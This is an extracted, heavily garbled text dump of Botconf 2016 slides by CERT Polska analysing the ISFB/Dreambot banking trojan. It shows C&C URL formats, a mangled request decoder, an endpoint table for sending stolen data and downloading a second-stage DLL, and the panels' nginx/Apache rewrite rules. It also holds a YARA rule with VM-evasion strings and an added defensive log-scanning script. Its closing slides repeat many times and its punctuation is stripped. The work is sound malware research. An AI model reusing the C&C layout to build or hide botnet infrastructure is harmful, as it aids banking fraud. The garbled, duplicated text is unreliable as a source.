httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control


IAP

  rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1     break;
  rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1.$2    break;
  rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1.$2  break;
  rewrite ^/images/(.*)\.(gif)  /task.php?x=$1.$2    break;
  rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1.$2  break;

Dreambot

  RewriteEngine on
  RewriteRule ^c(.+)\.php$           new_chandler.php          [L,QSA]
  RewriteRule ^t(.+)\.php$           new_thandler.php          [L,QSA]
  RewriteRule ^d(.+)\.php$           new_dhandler.php          [L,QSA]
  RewriteRule ^images/(.*)\.(bmp)    new_dhandler.php?q=$1.$2  [L,QSA]
  RewriteRule ^images/(.*)\.(gif)    new_thandler.php?q=$1.$2  [L,QSA]
  RewriteRule ^images/(.*)\.(jpeg)   new_chandler.php?q=$1.$2  [L,QSA]
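The two server-side rule sets (IAP's nginx rewrites and Dreambot's Apache rewrites) can be turned around into a classifier for proxy logs. The block below is an added example, not code from the talk or from either panel: it re-expresses both rule sets as first-match regex tables, tags a request with the handler each family's C&C would dispatch it to, and runs that over a constructed Common Log Format excerpt. Paths are normalized to a leading slash and the query string is stripped before matching, which is what both web servers do. The blob-shape heuristic (looks_like_blob and its 32-character threshold) and the log lines are this example's own assumptions; the first images/ path is the one from the URL-format slide.

```python
import re
from typing import Dict, List, Optional

# The rewrite rules from the IAP (nginx) and Dreambot (Apache) configs on the
# slides, as Python regexes; handler names are the ones in those configs.
IAP_RULES = [
    (re.compile(r"^/fileto/(.*)\.bin$"), "get128.php"),
    (re.compile(r"^/images/(.*)\.bmp$"), "data.php"),
    (re.compile(r"^/images/(.*)\.avi$"), "loader.php"),
    (re.compile(r"^/images/(.*)\.gif$"), "task.php"),
    (re.compile(r"^/images/(.*)\.jpeg$"), "config.php"),
]
DREAMBOT_RULES = [
    (re.compile(r"^/c(.+)\.php$"), "new_chandler.php"),
    (re.compile(r"^/t(.+)\.php$"), "new_thandler.php"),
    (re.compile(r"^/d(.+)\.php$"), "new_dhandler.php"),
    (re.compile(r"^/images/(.*)\.bmp$"), "new_dhandler.php"),
    (re.compile(r"^/images/(.*)\.gif$"), "new_thandler.php"),
    (re.compile(r"^/images/(.*)\.jpeg$"), "new_chandler.php"),
]


def route(path: str, rules) -> Optional[str]:
    """First-match dispatch like the web server; the query string is not matched."""
    body = "/" + path.split("?", 1)[0].lstrip("/")
    for rx, handler in rules:
        if rx.match(body):
            return handler
    return None


def tag_request(path: str) -> Dict[str, Optional[str]]:
    """Handler each family's C&C would route this path to (None = not served).
    fileto/*.bin is IAP-only, c*/t*/d*.php is Dreambot-only (the pre-2015
    handlers kept alive); images/*.{gif,jpeg,bmp} is accepted by both."""
    return {"iap": route(path, IAP_RULES), "dreambot": route(path, DREAMBOT_RULES)}


# Heuristic, an assumption of this example and not from the talk: the images/
# body is base64 with '+' and '/' escaped as _2B/_2F plus random '/' splits,
# so it is long and drawn only from [A-Za-z0-9_]; a real 'logo.jpeg' is not.
_BLOB_CHARS = re.compile(r"^[A-Za-z0-9_]+$")
_IMAGES_RE = re.compile(r"^/images/(.+)\.(gif|jpeg|bmp|avi)$")


def looks_like_blob(path: str, min_len: int = 32) -> bool:
    m = _IMAGES_RE.match(path.split("?", 1)[0])
    if not m:
        return False
    joined = m.group(1).replace("/", "")
    return len(joined) >= min_len and bool(_BLOB_CHARS.match(joined))


# Common Log Format: client ident user [time] "METHOD path proto" status bytes
_CLF = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')


def scan_log(text: str) -> List[Dict[str, object]]:
    """Tag each request line; flag it when some ISFB C&C would accept the path
    and, for the ambiguous images/ paths, the body also looks like a blob."""
    hits = []
    for line in text.splitlines():
        m = _CLF.match(line)
        if not m:
            continue
        path = m.group("path")
        tags = tag_request(path)
        ambiguous = path.startswith("/images/")
        suspicious = any(tags.values()) and (not ambiguous or looks_like_blob(path))
        hits.append({"client": m.group("client"), "path": path, **tags,
                     "suspicious": suspicious})
    return hits


# Constructed proxy log (not real traffic); line 1 reuses the slide's images/ path.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Dec/2016:10:00:01 +0100] "GET /images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul/jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg HTTP/1.1" 200 512
10.0.0.5 - - [02/Dec/2016:10:00:09 +0100] "GET /fileto/3f2a9c.bin HTTP/1.1" 200 102400
10.0.0.7 - - [02/Dec/2016:10:01:13 +0100] "GET /images/logo.jpeg HTTP/1.1" 200 4096
10.0.0.9 - - [02/Dec/2016:10:02:40 +0100] "POST /tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY HTTP/1.1" 200 16
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Matching the extension alone is not a detection: any site serves images/*.jpeg, so the rule fires only when the path body has the blob shape, and the family-specific paths (fileto/*.bin, c*/t*/d*.php) are the ones worth alerting on outright.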


Dreambot

  rule isfb_dreambot : banker
  {
      meta:
          author = "mak"
          module = "isfb"
      strings:
          $str0 = "vmware" fullword
          $str1 = "vbox" fullword
          $str2 = "virtual hd" fullword
          $str4 = "qemu" fullword
          $str3 = "c:\\321.txt" fullword
      condition:
          all of them and isfb_dropper
  }

The End... or not

Offsprings and Cousins

Payloads
  · Nymaim
  · Powersniff / PunchyBagg

Common roots
  · Bolek/KBOT - based on Gozi
  · Rovnix - ISFB was the ring3 payload protected by Rovnix
  · Vawtrak - nothing in common

Recap

  · One of the oldest bankers under active development
  · Interesting solutions
  · Various methods of infection
  · Elaborate communication methods: DGA, P2P, TOR
  · Old bugs die hard
  · Read the paper for more details
  · Code soon available on GitHub (mak, random-stuff/isfb)

Kudos

People that knowingly (or not) helped us:
  · Slavo
  · Paul Black
  · Kafeine
  · Peter Kruse
  · Piotr Kijewski
  · Jarosław Jedynak
  · Horgh
  · Frank Ruiz

Q & A

  info@cert.pl   www.cert.pl
  CERTPolska
  CERTPolska_en
  mak   mak@cert.pl


httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 51: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 52: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 53: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 54: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 55: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 56: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 57: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 58: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl